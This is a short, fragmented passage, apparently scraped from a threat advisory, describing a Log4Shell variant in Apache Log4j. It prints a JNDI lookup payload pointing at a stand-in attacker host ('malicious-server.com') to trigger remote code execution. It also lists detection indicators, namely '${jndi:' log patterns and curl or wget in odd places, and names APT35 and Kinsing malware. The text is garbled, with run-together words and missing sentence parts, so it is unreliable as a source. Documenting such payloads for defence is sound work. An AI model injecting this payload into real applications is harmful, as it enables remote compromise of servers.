Log4Shell
vulnerability targeting Apache Log4j
logging library used in Java applications. This variant demonstrates exploitation techniques and indicators slightly different from CVE-2021-44228.
${jndi:ldap://malicious-server.com/a}
to trigger remote code execution (RCE) within applications using vulnerable Log4j versions.
${jndi:
patterns in application logscurl
or wget
in unusual locationsAPT35
and Kinsing
malware.